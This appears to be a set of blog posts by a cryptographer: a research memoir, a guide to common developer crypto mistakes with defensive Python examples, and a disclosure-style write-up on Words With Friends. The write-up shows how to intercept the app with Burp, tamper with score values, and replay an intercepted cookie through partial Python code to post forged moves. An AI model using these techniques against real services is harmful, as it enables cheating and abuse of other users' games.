I turned away and thought, “no I need to get back to number theory research.” Gratefully, the little man in my head shook my brain and screamed: “What’s the matter with you, idiot! There’s something interesting here!” So I went back to the equation, thought about it more, and then convinced myself that there is opportunity here. I showed it to Ron, and he said this looks like a breakthrough.

Ron helped me formalise it and justify its significance, and we wrote it up in pretty good detail. Igor Shparlinski helped us in an essential analysis part, but he said he didn’t think his contributions were significant enough to coauthor. We then showed it to Arjen, who had an idea to make it faster and helped the overall writeup.

Finally, I had my breakthrough. The VSH hash function was published at Eurocrypt. The paper came just after Wang et al. broke all the practical hash functions. I had solved the right problem, in the right way, at the right time. Or at least so I had thought.
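For the curious, the core of the compression can be sketched in a few lines (a simplification of the actual paper construction; sympy’s prime gives the i-th prime). The remarkable property is that a collision hands you a relation involving a product of small primes, from which one can extract a nontrivial modular square root, something assumed to be as hard as factoring-related problems:

from sympy import prime

def vsh_compress(bits, n, k=8):
    # repeatedly square, multiplying in the first k primes as selected
    # by the next k message bits, all modulo an RSA-like modulus n
    x = 1
    for j in range(0, len(bits), k):
        x = (x * x) % n
        for i, b in enumerate(bits[j:j + k]):
            if b:
                x = (x * prime(i + 1)) % n
    return x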

Another significant area I worked on was HMAC. Given that the underlying hash functions were broken, what were the implications for HMAC? Yiqun led this. My main contribution was coming up with practical algorithms to attack HMAC and NMAC given hash collisions, which was significant to the paper. So this was my second significant research result.

Finally, I felt like I had made it as a cryptography researcher. Finally I started having confidence that I could make a career of doing this. Ironically, I decided not to.

Additional tips for those aiming to become cryptographers

I would like to think I have learned a thing or two about research in all these years of effort. So here is the advice I pass on to those who are just making the journey.

The number one piece of advice is to read Richard Hamming’s advice on how to do great research. I first discovered this while doing my “PostDoc” research at Macquarie University. I must have read it at least 10 times thereafter. You need to know where the field is going in order to make significant contributions. If you don’t work on the right problems, you’re not going to have an impact. Surrounding yourself with experts in the field will help guide you in making an impact. Don’t be afraid of going after the big problems.

Another point from Hamming is selling your research. He is so right. When I first got publications, I considered the writeup the boring part: I had solved a problem, now I need to waste all this time writing it up rather than go out and solve more problems? Absolutely the wrong attitude. Think about the people you look up to as researchers. You might have names like Dan Boneh, Adi Shamir, etc…. If your list is anything like mine, you may notice that they are great communicators. They write well and they present their research well. If you can clearly explain and motivate the problem you are trying to solve, it will not only attract others to your research, but it will also help you better understand the value of your research and the interesting directions you can go.

Doing research is frustrating. One of the things that threw me off is that although I was very good at a lot of things, I just did not have the mathematical depth of many people in the field. How could I compete with them?

It wasn’t until VSH that it dawned upon me that you don’t have to be the greatest mathematical mind to make an impact. Think of great impacts like RSA: it is just a coincidence that it was invented by some of the best cryptographers ever; mathematically it really is very simple. Another example is Shamir Secret Sharing: such a simple concept with great impact, and it is only a coincidence that it was invented by the greatest cryptographer ever! My point is, don’t be intimidated like I was just because other people know more: often simple ideas have the biggest impact. Try a lot of ideas, and be creative and persistent.

It really helps a lot to master some mathematical tools. For me, smoothness was what helped, and it had only been used minimally for constructive purposes in cryptography before.

Many times I thought to myself “I really need to master lattices”, but then later dismissed it: “I’m too late: all the low hanging fruit is gone.” I was so wrong: it was never too late!

Why I left cryptography

If there is interest, in a future blog I will write about why I left cryptography.

Top 10 Developer Crypto Mistakes

After doing hundreds of security code reviews for companies ranging from small start-ups to large banks and telcos, and after reading hundreds of stack overflow posts on security, I have composed a list of the top 10 crypto problems I have seen.

Bad crypto is everywhere, unfortunately. The frequency with which I find crypto done correctly is much lower than the frequency with which I find it done incorrectly.  Many of the problems are due to complex crypto APIs that are insecure by default and have poor documentation. Java is the biggest offender here, but it does not stand alone. Perhaps Java should learn from its archenemy, .Net, on how to build a crypto API that is easier to use and less prone to security problems.

Another reason for so many problems is that finding the issues seems to require manual code analysis by a trained expert. According to my experience, the popular static analysis tools do not do well in finding crypto problems. Also, black-box penetration testing will almost never find these problems. My hope in publishing this list is for it to be used by both code reviewers and programmers to improve the state of crypto in software.

The list:

1. Hard-coded keys
2. Improperly choosing an IV
3. ECB mode of operation
4. Wrong use or misuse of a cryptographic primitive for password storage
5. MD5 just won’t die. And SHA1 needs to go too!
6. Passwords are not cryptographic keys
7. Assuming encryption provides message integrity
8. Asymmetric key sizes too small
9. Insecure randomness
10. “Crypto soup”

Now we break it down in detail:

1. Hard-coded keys

I have seen this very often. Hard-coding keys implies that whoever has access to the software knows the keys to decrypt the data (and for those developers who start talking about obfuscation, my 10th entry is for you). Ideally, we never want cryptographic keys accessible to human eyes (for example, see what happened to RSA about six years ago). But many companies fall far short of this ideal, and therefore the next best thing we can ask is to restrict access to the keys to a security operations team only. Developers should not have access to production keys, and especially those keys should not be checked into source code repositories.

Hard-coded keys are also indicative of insufficient thought about key management. Key management is a complex topic that goes well beyond the scope of this blog.  But what I will say is that if a key gets compromised, then rotating a hard-coded key requires releasing new software that must be tested before going live.  Releasing new software takes time, which is not a luxury when incidents like this happen.

It’s easy for security people to tell developers what not to do, but the unfortunate reality is that what we really want them to do is often not feasible for whatever reason. Therefore, developers need some middle-ground advice.

A big caveat here: I am not a security operations person nor an expert on key management, but I can comment on what I have seen from a distance in some places.  Even though it is less than ideal, a configuration file is a better option for key storage than hard-coding. Although some frameworks support encrypted configuration sections (see also this .Net guidance), what is really needed is for developers to have test keys in their test and development environments, with these keys replaced by real keys by a security operations team upon deployment into the live environment.

I have seen the above guidance botched in practice. In one case, the deployment team put in an RSA public key incorrectly, and decryption failed because there was no private key corresponding to the erroneous public key. My advice is that the software needs a means of testing itself to make sure it can encrypt/decrypt (or whatever operation it needs to do), or else there needs to be a procedure as part of the deployment to make sure things work as expected.
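As a sketch of both points, assuming Python's cryptography package and an APP_FERNET_KEY environment variable injected by the ops team (both names are illustrative):

import os
from cryptography.fernet import Fernet

def startup_crypto_check():
    key = os.environ['APP_FERNET_KEY']  # injected at deploy time, never in git
    f = Fernet(key)
    # round-trip self-test so a bad or mismatched key fails fast at startup
    assert f.decrypt(f.encrypt(b'probe')) == b'probe'
    return f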

2. Improperly choosing an IV

IV means initialization vector.  This problem usually shows up with the CBC mode of encryption. Very often it is a hard-coded IV, usually all 0s. In other cases, some magic is done with a secret (sometimes the key itself) and/or a salt, but the end result is that the same IV is used every time. The worst one I have seen, on three occasions, is the key also used as the IV — See Section 7.6 of Crypto 101 on why this is dangerous.

When you are using CBC mode of operation, the requirement is that the IV is chosen randomly and unpredictably.  In Java, use SecureRandom.  In .Net, simply use GenerateIV.  Also, you cannot just choose an IV this way once and then use the exact same IV again for another encryption.  For every encryption, a new IV needs to be generated. The IV is not secret and is typically included with the encrypted data at the beginning.
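In Python, a sketch of doing it properly might look like this (assuming the cryptography package; the fresh random IV is prepended to the ciphertext):

import os

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def encrypt_cbc(key, plaintext):
    iv = os.urandom(16)  # a new random IV for every single encryption
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return iv + encryptor.update(padded) + encryptor.finalize()  # IV is not secret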

If you do not choose your IV properly, then security properties are lost. An example of improper choice of IV where the implications were huge is in SSL/TLS.

Unfortunately, APIs are often the problem here. Apple’s API is a perfect example of what not to do (note: I am using this mirror of Apple’s code so I can link directly to the evidence): it tells developers the IV is optional and uses all zeros if it is not provided. Sure, it will still encrypt and decrypt, but it is not secure, Apple!

More information about requirements for IVs and nonces in various modes of operation is given here.

3. ECB mode of operation

When you encrypt with a block cipher such as the AES, you should choose a mode of operation.  The worst one you can choose or have chosen for you is ECB mode, which stands for Electronic Code Book.

It doesn’t matter what block cipher is under the hood: if you are using ECB mode, it is not secure because it leaks information about the plaintext. In particular, duplicate plaintexts become duplicate ciphertexts. If you think that doesn’t matter so much, then you probably have not seen the encrypted penguin yet either (this image is Copyright Larry Ewing, lewing@isc.tamu.edu, and I am required to mention The GIMP):

[Image: the ECB-encrypted Tux penguin, still clearly recognisable]
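You can see the leak for yourself in a few lines (again assuming Python's cryptography package):

import os

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(16)
encryptor = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
ct = encryptor.update(b'A' * 16 + b'A' * 16) + encryptor.finalize()
print(ct[:16] == ct[16:32])  # True: identical blocks encrypt identically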

Bad APIs, like Java’s, leave it up to the provider to specify the default behaviour. Typically, ECB is used by default. Embarrassingly, OWASP gets this wrong in their “Good Practice: Use Strong Algorithms” example, though they get it right here, which is one of the few places on the internet that looks to be free of problems.

Bottom line: Don’t use ECB mode.  See here for guidance on modes that are safe to use.

4. Wrong use or misuse of a cryptographic primitive for password storage

When a crypto person sees PBKDF2 being used with 1000 iterations for password storage, they may complain that 1000 iterations is too few and a function like bcrypt is a better choice anyway. On the other hand, I have seen so much worse that I’m just excited that the developer is on the right track.

Part of the problem here is terminology, which the cryptographic community has made no effort to fix. Hash functions are wonderful, magical functions. They are collision resistant, preimage resistant, 2nd preimage resistant, behave like random oracles, and they are both fast and slow at the same time. Maybe, just maybe, it is time to define separate cryptographic functions for separate purposes rather than relying too much upon a single source of magic.

For password processing, the main properties we need are slow speed, preimage resistance, and 2nd preimage resistance. The slow speed requirement is explained wonderfully by Troy Hunt.

There are specific functions designed to meet these goals: pbkdf2, bcrypt, scrypt and argon2. Thomas Pornin has played an excellent role in helping developers and security engineers understand this. Now if only we could get rid of the MD5, SHA1, SHA256, and SHA512 implementations for processing passwords!

Also, I sometimes see APIs that make available PBKDF1, which really should not be used any more. Examples include Microsoft and Java.

Another common problem I see is hard-coded salts when doing password processing. One of the main purposes of the salt is to ensure that two identical passwords do not “hash” to the same value. If you hard-code the salt, then you lose this property. In that case, anyone who gets access to your database can readily identify the easy targets by doing a frequency analysis on the ‘hashed’ passwords. The attacker’s efforts suddenly become more focused and more successful.

For developers, my recommendation is to do what Thomas Pornin says. He has commented on various aspects of password processing frequently on the security stack exchange.

Personally, I would go with bcrypt if that is possible. Unfortunately, many libraries only give you PBKDF2. If you are stuck with that, then make sure you use at least 10,000 iterations and be happy that your password storage is better than most.
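If you are in that position, the pattern is simple enough. Here is a minimal Python sketch using only the standard library (the 100,000 iteration count is illustrative, so tune it to what your hardware tolerates):

import hashlib, hmac, os

def hash_password(password):
    salt = os.urandom(16)                     # random per-user salt, stored with the hash
    digest = hashlib.pbkdf2_hmac('sha256', password, salt, 100000)
    return salt, digest

def verify_password(password, salt, expected):
    candidate = hashlib.pbkdf2_hmac('sha256', password, salt, 100000)
    return hmac.compare_digest(candidate, expected)   # constant-time comparison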

5. MD5 just won’t die. And SHA1 needs to go too!

MD5 has been broken in practice for more than 10 years, and there were warnings against using it for more than 20 years.  Yet I am still finding MD5 in many, many places. Often, it is being used in some crazy way where it is not clear what security properties are needed.

SHA1 has been broken in theory for almost as long as MD5, but the first real attack only came recently. Google did well to deprecate it from certificates years before the practical break; however, SHA1 still lives on in developer code in many places.

Whenever I see developer code using a cryptographic hash function, I get worried. Often they do not know what they are doing. Hash functions are wonderful primitives for cryptographers to use in building useful cryptographic primitives such as message authentication codes, digital signature algorithms, and various prngs, but letting developers do what they please with them is like giving a machine gun to an 8 year old. Developers, are you sure these functions are what you need?

6. Passwords are not cryptographic keys

I see this often: not understanding the difference between a password and a cryptographic key. Passwords are things people remember and can be of arbitrary length. Keys, on the other hand, are not limited to printable characters and have a fixed length.

The security issue here is that keys should be full entropy, whereas passwords are low entropy by nature.  Sometimes you need to change a password into a key.  The proper way to do this is with a password based key derivation function (pbkdf2, bcrypt, scrypt or argon2), which compensates for the low entropy input by making the derivation of the key from the password a time consuming process.  Very seldom do I see this done.

Libraries like Crypto-js blend the concepts of keys and passwords together, and inevitably people who use it wonder why they cannot encrypt in JavaScript and then decrypt in Java or .Net or whatever other language/framework. Worse, the library uses some awful algorithm based upon MD5 to convert the password to a key.

My advice to developers: whenever you find an API that accepts passwords or passphrases for encryption, avoid it unless you know specifically how the password is converted to a key. Hopefully, the conversion is done with an algorithm such as PBKDF2, bcrypt, scrypt, or argon2.

For APIs that take keys as input, generate the keys using a cryptographic prng such as SecureRandom.
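To make the distinction concrete, here is a short Python sketch of both cases (the names and values are mine, for illustration only):

import hashlib, os, secrets

# A key: full-entropy bytes straight from a cryptographic prng.
key = secrets.token_bytes(16)

# A password: low entropy, so stretch it through a slow KDF with a salt.
password = b"correct horse battery staple"
salt = os.urandom(16)                         # store the salt alongside the ciphertext
derived_key = hashlib.pbkdf2_hmac('sha256', password, salt, 100000)[:16]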

7. Assuming encryption provides message integrity

Encryption hides data, but an attacker might be able to modify the encrypted data, and the results can potentially be accepted by your software if you do not check message integrity. While the developer will say “but the modified data will come back as garbage after decryption”, a good security engineer will find the probability that the garbage causes adverse behaviour in the software, and then turn that analysis into a real attack. I have seen many cases where encryption was used but message integrity was really needed more than the encryption. Understand what you need.

There are certain encryption modes of operation that provide both secrecy and message integrity, the best known being GCM. But GCM is unforgiving if a developer reuses an IV. Given how frequent the IV reuse problem is, I cannot recommend GCM mode.  Alternative options are .Net’s Counter with CBC-MAC and Java BouncyCastle’s CCMBlockCipher, EAXBlockCipher, and OCBBlockCipher.

For message integrity only, HMAC is an excellent choice. HMAC uses a hash function internally, and the specific one is not too important. I recommend that people use a hash function such as SHA256 under the hood, but the truth is that even HMAC-SHA1 is quite secure even though SHA1 lacks collision resistance.

Note that encryption and HMAC can be combined for both secrecy and message integrity. But the catch here is that the HMAC should not be applied to the plaintext but instead to the ciphertext combined with the IV.  Acknowledgments to the good people at /r/crypto for correcting earlier versions of this section.
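Here is a rough Python sketch of that encrypt-then-MAC pattern, using the pyca/cryptography library for the cipher and the standard library for the HMAC (note the two independent keys; the function name is mine):

import hashlib, hmac, os
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def encrypt_then_mac(enc_key, mac_key, plaintext):
    iv = os.urandom(16)
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    encryptor = Cipher(algorithms.AES(enc_key), modes.CBC(iv)).encryptor()
    ciphertext = encryptor.update(padded) + encryptor.finalize()
    tag = hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()  # MAC covers IV + ciphertext
    return iv + ciphertext + tag

On decryption, recompute the tag over the received IV and ciphertext and compare it with hmac.compare_digest( ) before attempting any decryption.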

8. Asymmetric key sizes too small

Developers do really well in choosing their symmetric key sizes, often choosing much stronger than they need (128-bit is enough). But for asymmetric crypto, they often err on the other side.

For RSA, DSA, DH, and similar algorithms, 1024-bit keys are within reaching distance of an organisation such as the NSA, and will soon become reachable by smaller organisations thanks to Moore’s law. Use at least 2048 bits.

For elliptic curve based systems, one can get away with much smaller key sizes. I have not seen these algorithms used by developers so often, so I have not seen problems with key sizes for them.

General guidance on key sizes is provided here.
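In most libraries, the asymmetric key size is a single parameter, so there is little excuse for getting it wrong. A quick sketch in Python with recent versions of the pyca/cryptography library:

from cryptography.hazmat.primitives.asymmetric import rsa

# 2048 bits as the floor; consider 3072+ for data that must stay secure long term.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()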

9. Insecure randomness

I’m surprised that this does not occur more often, but I do find it from time to time. The general issue is that typical (pseudo) random number generators may look random to the untrained eye, but they fail the unpredictability requirement under the eye of a trained expert.

As an example, imagine you are using java.util.Random to generate a session token for a web application. When I as a legitimate user get my session token, I (using my crypto expertise) can then predict the next session token for the next user and the previous session token for the previous user. I can then hijack their sessions.

This would not be possible if the session token is generated with SecureRandom. The general requirement is a pseudo random number generator with cryptographic security. In .Net, the good source is System.Security.Cryptography.RandomNumberGenerator.

It is also worth mentioning that just because you are using a good source of randomness does not mean that you cannot screw up. For example, I saw one implementation that took a 32-bit integer from SecureRandom and hashed it to produce a session token. It never occurred to the developer that this implies at most 2^32 possible sessions, which would allow an attacker to hijack one just by enumerating those values.
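In Python, for example, both lessons fit in a couple of lines of the standard library: draw tokens from the operating system's cryptographic prng, and give them enough entropy that enumeration is hopeless.

import secrets

# 32 bytes = 256 bits of entropy: enumeration is hopeless, unlike
# hashing a 32-bit integer (at most 2^32 distinct tokens).
session_token = secrets.token_urlsafe(32)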

10. “Crypto soup”

I use this term to mean a developer mixing a bunch of cryptographic primitives together without a clear goal. I don’t like to call it roll-your-own-crypto, because I think of that term as describing an attempt to build something where the goals are clear, such as a block cipher.

Crypto soup often uses hash functions, and at this point you may want to have a second look at my final paragraph for point 5. When I see this, I want to scream to the developer “get your hands off that hash function, you don’t know what you’re doing!”

I remember one case of crypto soup where the developer used a hard-coded key. I told him that it was unclear what he was trying to do, but that he could not use hard-coded keys. This caused him a lot of trouble, because there was no clear path forward to getting the key out of the source. Eventually, he explained that he did not really need security for what he was doing; he was just trying to obfuscate. Huh? This is exactly the type of conversation one tends to get into upon encountering crypto soup.

Concluding remarks

To improve the state of crypto in developer code, I make the following recommendations:

  • We need more educators!  I’m talking about people who understand crypto and also developer code.  I am pleased to find some very good people on Stack Overflow, but it is still the case that there is a lot of bad guidance all over the internet.  More good people need to help correct this.
  • Crypto APIs need to get better.  Using cryptographic functionality correctly needs to be easy.  It needs to be secure by default.  And the documentation needs to be very clear about what is happening.  Microsoft is going the right direction, Java is not.
  • Static analysis tools need to improve.  Some of the issues above the tools will not be able to find, but others they should be able to.  I am aware of one called Cryptosense, but unfortunately I have not had the opportunity to try it.  I have played a lot with big name tools and have been disappointed due to their lack of findings.
  • Code reviewers need to manually search for crypto problems.  It really is not that hard.  Start by doing a grep -Rli crypt (see how to do equivalent in Powershell) to get a list of files that contain the word “crypt”.  Also search for MD5 and so on.
  • Crypto researchers need to be more attached to real-world security problems.  If people like Dan Boneh and his colleagues can do research like this, then others can as well.  We need a lot more help to clean up the world’s crypto mess.

Words With Friends Trusts The Clients A Little Too Much

Words With Friends is a Scrabble-like game, which boasts being the world’s most popular word game.

Through a combination of an intercepting proxy and a partially reverse engineered Words With Friends client, we made a number of interesting discoveries. Among them are:

  • How to make your average points per move and your weekly points tally ridiculously high.

  • How to see the letters your opponent has, and the next letters that will be drawn.

  • How to play invalid “words”.

  • How to play words that are not connected to any other words on the board.

Getting Started: Using an Intercepting Proxy

I’ll describe how to do this with an iOS device running Words With Friends and a Mac.  Details for other computers and devices need to be found elsewhere.

We are going to set it up so you can inspect and intercept the iOS communications on your Mac. Download the Burp proxy on your Mac (the free version is sufficient), and follow these instructions to get the Mac intercepting unencrypted communications from the iPad. Then start your iOS browser and go to an http site (not https) to verify that the communications are passing through the Mac. If things seem stuck, make sure the intercept is turned off. This youtube tutorial is a decent introduction for those who have not used Burp before.

The next step is to be able to get encrypted (https) communications passing through the Mac. To do so, you need to install the Burp root certificate (from your Mac) onto your iOS device. This can be done following these instructions.

You should now have everything from your iOS device going through Burp on your Mac. Verify this by visiting an https website in your browser, and checking on Burp that the communications are traveling through.

After you have completed this, you may now start Words With Friends. The communications should be traveling through Burp. The fun begins now.

The Mystery of Billy The Kid

If you have a version of Words With Friends that supports a global leaderboard, you may have noticed that nearly every week there is a guy named Billy The Kid at the top. If you looked further, you may have noticed that his average points per move is almost always 1999. How can one possibly average this many points per word? Answer: he set up his client to lie to the Words With Friends server about his score, and you can too.

If you turn the Burp intercept on immediately prior to making a move, you will see something like this for the content (potentially sensitive content blurred out):

[screenshot: the intercepted HTTP POST for playing a move]

The version of Words With Friends here uses XML, but later versions use JSON. Regardless, notice the highlighted “points=33”. You can change that points value to a larger one and the server will believe it, provided that you keep the new value under 2000. Hence, in Burp intercept, we could change it to something like 1933:

[screenshot: the same request with points changed to 1933]

This will not affect the score on the clients, which is computed independently, but it will be figured into your average and weekly points tally. The interception above was done on my son’s account while he was playing. He was very excited to see how much his average shot up after a few plays – see below (full identity blurred out). He was #1 in the world until Billy The Kid showed up a couple of days later.

[screenshot: the leaderboard showing the inflated average]

For those concerned parents, no I am not teaching my child to hack and cheat, but instead asked him to volunteer for my proof-of-concept experiment. We only did it this one session! 🙂

Digging Deeper: Building Your Own Words With Friends Client

Looking again at the HTTP POST for playing a word, the next question we ask is whether we can play arbitrary words by changing the words parameter in the query string. It doesn’t work. When I first tried it, I assumed it was the board_checksum in the POST body that was making it fail, but in retrospect I now think the text tag might have also caused a problem.

To deal with these problems, I Googled for Words with Friends board_checksum, and I found a partially reverse engineered Python client written by Jahn Veach. This code is really nicely written, but does not yet provide the server API calls to play moves. Nevertheless, Jahn had done most of the hard part in terms of providing a Words with Friends Python client.

I made a local copy and updated Jahn’s code to make it play words and do a few other communications with the server. Also, Jahn’s code expects XML communications, which is what you saw in the HTTP POST in the previous section, but more recent Words With Friends clients use JSON. I like JSON much better than XML, so I updated his code to use JSON.

I’m not going to make my code available, because the last thing I want is a bunch of script kiddies cheating and ruining the game for everyone. But for those who want to go further than what I did, I’ll tell you a bit about it (and please, don’t make cheating clients publicly available).

The main thing you need to communicate with the Words With Friends server is the cookie, which you can intercept through Burp. Alternatively, Jahn tried to set up his code so that you can log in, but I just use my intercepted cookie to communicate with the server. Once you have the cookie, the following Python API call can be used to make a move:

import requests   # the client uses the requests library for all HTTP calls

def api_send_move( url, move_string, points, words, cookie ):
    headers = {'Content-Type': 'application/json',
            'Accept': 'application/json',
            'User-Agent': 'NewWordsWithFriendsFree/3.403 CFNetwork/711.3.18 Darwin/14.0.0',
            'Cookie': cookie
            }
    params = { 'points': str(points), 'words': words }
    r = requests.post( url, headers=headers, params=params, data=move_string )

    return r.text

The move_string is a JSON string that can be obtained by a json.dumps( ) of a structure like this:

            jsonMove = {
                "move": {
                    "from_y": moveObj.fromY, 
                    "from_x": moveObj.fromX, 
                    "move_index": moveObj.moveIndex,
                    "text": moveObj._text, 
                    "to_x": moveObj.toX, 
                    "to_y": moveObj.toY, 
                    "board_checksum": moveObj.boardChecksum,
                    "promoted": moveObj.promoted, 
                    "game_id": moveObj.gameId
                }
            }

The moveObj is an object from the Move class in Jahn’s code. I have Python code that populates this. Currently my code only allows contiguous moves. The code is below, where selected is a list containing the letters selected from your letter rack and h_or_v tells whether the word is horizontal or vertical:

    moveObj = Move()
    moveObj.gameId = game.id
    moveObj.userId = player_id
    moveObj.fromX = x_coord
    moveObj.fromY = y_coord
    if h_or_v == 'h': # horizontal
        moveObj.toX = x_coord + len(word)-1
        moveObj.toY = y_coord
    else:   # vertical
        moveObj.toX = x_coord
        moveObj.toY = y_coord + len(word)-1
    moveObj.moveIndex = len(game.moves)
    moveObj.text = None
    if (len(word)) == 1:
        moveObj.promoted = 3    # one letter words have promoted = 3
    elif h_or_v == 'h':
        moveObj.promoted = 1    # horizontal moves have promoted = 1
    else:
        moveObj.promoted = 2    # vertical moves have promoted = 2
    moveObj.boardChecksum = None    # This will be computed when board is updated
    moveObj.player = current_user
    moveObj._text = ""
    for i in range(len(word)):
        for j in range(len(rack)):
            if selected[j] == i+1:
                moveObj._text += str(rack[j]) + ","
    workingGame.addMove( moveObj )

If you want to play a word that goes across other letters already played (i.e. non-contiguous moves), then the moveObj._text needs to include “,*” to represent the letters that were already on the board. Additionally, the moveObj.toX or moveObj.toY needs to be adjusted for those letters as well.

As I mentioned above, not only did I need the board_checksum to make this work, but I also think the text XML tag (or JSON tag) was needed. It contains the identity of the letters you played. That identity is according to the LETTER_MAP in Jahn’s code. The code above computes both the board_checksum and the text tags.

I also had to update the code to get a list of your games in JSON format. I threw in a few kludges to make it work (this needs to be cleaned up!):

def api_get_games( url, cookie ):
    headers = {'Content-Type': 'application/json',
            'Accept': 'application/json',
            'User-Agent': 'NewWordsWithFriendsFree/3.403 CFNetwork/711.3.18 Darwin/14.0.0',
            'Cookie': cookie
            }
    params = { 'game_type': 'WordGame',
            'include_invitations': 'true',
            'games_since':'0001-12-30%2000:00:00+00:00',
            'get_current_user':'true',
            # move_since seems to represent a time in milliseconds, where time 0 is approx 14 December 2009
            'moves_since':'195000000000',
            'last_read_chats_since': '1455000000',
            'chat_messages_since': '9783000000' }
    r = requests.get( url, headers=headers, params=params )
    return r.text

Playing Invalid Words With Python Client

The first thing I wanted to try was playing an arbitrary collection of letters to see if Words With Friends would accept it. I expected this to work for two reasons:

  1. Somebody once played the non-word “IZ” against me, which sent me off Googling about invalid words.

  2. I came across this blog, which describes a Words With Friends hacked client that allows you to play arbitrary words.

The next thing I needed was a candidate player to try it on. I’ve been playing Words With Friends long enough that I do not even blink when I see words like QOPH, ZLOTE, HADJI, AZINE, GHI, OAKUM, etc…, so if I’m going to try an arbitrary word, it needs to be against somebody who is pretty obviously cheating (i.e. using external tools to assist in the game).

My candidate: Donna (full identity omitted), who has played a number of suspicious words against me including: KIAUGH, SHEQEL, QINDARS, AECIUM, TRIJET, ARCHAIST, SCHAV, BULIMIC, SHULN. I think she’s cheating: while it is possible that a good player would know a few of these, knowing all of these is extremely unlikely, and being able to identify those words amongst a set of scrambled letters is even more unlikely.

So, here’s what I did. As you can see, from the legitimate client, AIRESHOR is not a word:

[screenshot: the legitimate client rejecting AIRESHOR]

Using my Python client, I attempted to play it (only showing part of the board):

[screenshot: the Python client playing AIRESHOR]

The legitimate client accepted it:

[screenshot: AIRESHOR accepted and shown on the board]

There you have it: no server-side enforcement of the rules!

Donna, if you’re out there reading this blog, sorry, but next time you’re just going to have to cheat a lot harder to beat me again.

Playing Disconnected Words

The next thought: if I can play invalid words, can I also play disconnected words? Yep:

[screenshot: a disconnected word accepted on the board]

Knowing Your Opponent’s Letters and the Next Letters to Be Drawn

Further inspection of the communications with Burp reveals that a random_seed (or random-seed) is sent from the server to the clients. Jahn’s code tells everything you need to know about this. The value is fed into a Mersenne Twister Pseudo Random Number Generator (mersenne.Mersenne in the code), which by the way is not cryptographically secure, but that’s the least of the problems here. The Mersenne Twister is used to select the letters you and your opponent draw next from the letter bag (drawFromLetterBag in the code).

The clients keep track of the letters you have and the letters your opponent has. One could simply output those letters to build a cheating client.

Please Don’t Cheat

I will never understand what joy people get knowing that they can beat somebody by cheating.  My Python client was not developed for the purpose of cheating, but instead was something that I developed out of curiosity.  As stated above, it was motivated by understanding how Billy The Kid was getting such a high average, and how somebody played an invalid word against me.  I have mostly used it for proof of concepts, though I did use it to get revenge against Donna, a very serious cheater.  That’s about it.

I love playing Words With Friends, and it burns me up when people like Donna cheat. Yes, these people are always going to exist, but if somebody built a client like mine and made it public, then it’s only going to get a lot worse for everybody.  With great power comes … ahh, forget it, you already know that cliché.

What Should (Have) Zynga Do(ne)?

If Zynga had architected the game according to security guidance, they would have done all rules enforcement on the server side, and they would also have performed the letter draw on the server rather than passing a seed to the clients and trusting them to do it.

I very much doubt that they are going to completely re-architect their game because of this. So, what are the dirty shortcut solutions they could have done to prevent people like me and Jahn from looking under the hood?

  • Prevent reverse engineering: code obfuscation. Sure, the security purists will tell you that that only slows down a hacker but never stops the hacker. My response: Words With Friends is 7 years old with no public hacked client.  Given that it is one of the most popular games out there, and given how easy it is to do what Jahn and I have done, it seems to me that the hackers don’t even have the time or motivation to do the simple stuff against Words With Friends, let alone the hard stuff. And by the way, I truly wish those hackers good luck in their efforts to beat something like Arxan. I fully agree that it is not impossible, but in practice, good luck. Alternatively, Zynga could have used the lower cost Dexguard to provide some level of hurdle to prevent reverse engineering.

  • Prevent intercepting proxy: I would not have been able to do what I did had Zynga used certificate pinning. It is certainly possible that certificate pinning could be bypassed, but it would require a lot more work, especially if obfuscation is used.  Update: See comment from Parsia about certificate pinning.

The two suggestions together might have been all they needed.

Zynga has a bug bounty program. They offer no financial reward, but the Hall of Fame is attractive to some white hats. I did not expect that the issues in this blog would qualify for their bug bounty program, but I emailed them nevertheless on 27th February 2016. They have not replied or acknowledged my email.

If I were Zynga, I would enforce a mandatory upgrade of clients and include the above two recommendations in it.  If they force incompatibility with previous clients, then they may be able to prevent somebody from developing a cheating client that could spoil the game for everyone.

How To Play Words With Friends Like a Pro (Without Cheating!)


Alright, now I feel compelled to conclude my blog with some tips and tricks to the game to help get your average over 30 points per move and your average game score around 400. So here we go:

  • Before you look at the board, look at the letters in your hand to see if you can form a bingo (i.e. using all 7 letters).
  • When looking at the letters in your hand to form a bingo, group suffixes such as the following together: ING, ERS, ER, ED, IER, IST, IEST, ISH, ….
  • When looking at the letters in your hand to form a bingo, group prefixes such as the following together: OVER, OUT, UN, RE, ….
  • Don’t always play with the greedy strategy: if you have N and G in your hand but not I, then save the two letters until you draw an I so that you later have ING. A small sacrifice in points in the earlier move can be a big gain in points later.
  • Don’t play an S or a blank unless it is increasing your score by at least 10 more points than the best word you can find without playing the S/blank.
  • Don’t be satisfied with less than 35 points when playing the letter X.  X can be combined with any vowel to form a 2-letter word (AX, EX, XI, OX, XU) so forming two 2-letter words with the X on a double-point square will give you at least 35 points most of the time.
  • Know all two letter words  (GI should also be on the list).
  • Know the English spelling of the letters in the Greek and Hebrew alphabets.
  • Remember, at the end of the game the person who goes out first gets a bonus: the total points of letters still in his opponent’s rack are subtracted from the opponent’s score and added to his score. It’s mathematically equivalent to adding a bonus of double the number of points remaining in that rack and not subtracting any from the other rack. For this reason, rather than maximising your points per word at the end of the game, instead try to maximise your points per word minus two times the sum of the points of the letters that remain in your rack after your word is played.
  • Don’t be afraid to swap letters when you have junk. I do it two or three times a game on average. BTW, swapping letters does not affect your weekly average points per move.
  • Take your time! This is not Scrabble, so don’t be afraid to spend more than a few minutes to find that big word!
